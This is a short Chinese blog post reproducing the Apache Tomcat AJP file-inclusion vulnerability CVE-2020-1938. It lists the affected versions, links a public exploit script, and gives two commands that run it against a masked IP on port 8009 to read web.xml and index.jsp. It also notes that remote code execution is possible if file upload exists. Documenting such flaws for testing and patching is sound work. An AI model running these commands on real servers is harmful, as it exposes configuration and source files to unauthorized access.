CVE-2020-1938漏洞復(fù)現(xiàn)

Apache Tomcat服務(wù)器存在文件包含漏洞(CVE-2020-1938)

詳細(xì)描述

Apache Tomcat服務(wù)器存在文件包含漏洞,攻擊者可利用該漏洞讀取或包含 Tomcat 上所有 webapp 目錄下的任意文件,如:webapp 配置文件或源代碼等。若目標(biāo)服務(wù)器同時(shí)存在文件上傳功能,攻擊者可進(jìn)一步實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行。

### 漏洞受影響版本
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31

腳本下載

    GitHub地址:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
    百度網(wǎng)盤(pán):https://pan.baidu.com/s/1e_WkP-5iPDZa2mcWVGImTw  提取碼:mm92

運(yùn)行環(huán)境

    python2.7.12

漏洞驗(yàn)證

### 成功讀取的是apache-tomcat-8.5.50/webapps/ROOT/WEB-INF/web.xml文件
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.xx.xx.xx -p 8009 -f WEB-INF/web.xml
image.png
### 成功讀取的是ROOT目錄下的index.jsp文件內(nèi)容
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.xx.xx.xx -p 8009 -f index.jsp
image.png

可讀取webapp 目錄下的任意文件。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。
禁止轉(zhuǎn)載,如需轉(zhuǎn)載請(qǐng)通過(guò)簡(jiǎn)信或評(píng)論聯(lián)系作者。

友情鏈接更多精彩內(nèi)容